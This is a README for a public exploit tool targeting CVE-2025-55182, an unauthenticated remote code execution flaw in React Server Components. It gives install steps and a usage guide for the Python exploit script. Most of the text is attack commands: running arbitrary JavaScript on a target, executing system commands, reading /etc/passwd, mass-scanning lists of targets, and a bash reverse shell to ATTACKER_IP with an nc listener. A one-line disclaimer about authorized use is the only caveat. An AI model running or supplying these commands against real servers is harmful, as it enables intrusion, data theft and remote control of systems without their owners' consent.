
POC React2Shell-CVE-2025-55182
____ _____ _ ____ _____ ____ ____ _ _ _____ _ _
| _ \| ____| / \ / ___|_ _|___ \/ ___|| | | | ____| | | |
| |_) | _| / _ \| | | | __) \___ \| |_| | _| | | | |
| _ <| |___ / ___ \ |___ | | / __/ ___) | _ | |___| |___| |___
|_| \_\_____/_/ \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
[ CVE-2025-55182 ]
Remote Code Execution Scanner for React Server Components (RSC)
| Role | Name | Link |
|---|---|---|
| Original Research | Lachlan Davidson | github.com/lachlan2k |
Based on the original PoC: React2Shell-CVE-2025-55182-original-poc
React2Shell is a comprehensive security scanner for CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) implementations. This vulnerability allows unauthenticated attackers to execute arbitrary JavaScript code on the server through unsafe deserialization in the React Flight protocol.
# Clone the repository
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182
# Install dependencies
pip install requests
# Run the scanner
python3 exploit_cve_2025_55182_v2.py -h
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
[--js JS] [--extract] [--sleep SECONDS]
[--callback URL] [--dns DOMAIN] [-v]
[--no-color] [--timeout TIMEOUT]
Passively detects vulnerable React and framework versions:
python3 exploit_cve_2025_55182_v2.py -t https://target.com
-m verify)Actively confirms RCE using multiple techniques and all 4 payload variants:
# Basic verification (digest variation)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify
# With time-based verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5
# With OOB callback (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com
# Full verification with verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
--sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v
-m custom)Execute arbitrary JavaScript payloads:
# Get Node.js version
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "process.version" --extract
# Execute system command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "require('child_process').execSync('id').toString()" --extract
# Read file
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "require('fs').readFileSync('/etc/passwd','utf8')" --extract
-f)Scan multiple URLs from a file and show only vulnerable targets:
python3 exploit_cve_2025_55182_v2.py -f targets.txt
# Version detection (default mode)
python3 exploit_cve_2025_55182_v2.py -t https://target.com
# RCE verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify
# Batch scan multiple targets
python3 exploit_cve_2025_55182_v2.py -f targets.txt
# Verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v
# Time-based + OOB verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
--sleep 5 --callback your-id.oastify.com
# Extract server info
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "process.version" --extract
# Execute command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "require('child_process').execSync('whoami').toString()" --extract
# Start listener
nc -lvnp 443
# Execute reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"
This tool is provided for authorized security testing and educational purposes only.
| Argument | Description |
|---|
-t, --target | Target URL (e.g., https://example.com) |
-f, --file | File with list of URLs (one per line) for batch scanning |
-m, --mode | Scan mode: version (default), verify, or custom |
--js | JavaScript code for custom mode |
--extract | Extract string result character by character |
--sleep SECONDS | Time-based RCE verification (verify mode) |
--callback URL | HTTP callback URL for OOB testing (verify mode) |
--dns DOMAIN | DNS callback domain for OOB testing (verify mode) |
-v, --verbose | Verbose output with payload details |
--no-color | Disable colored output |
--timeout SECONDS | HTTP request timeout (default: 30) |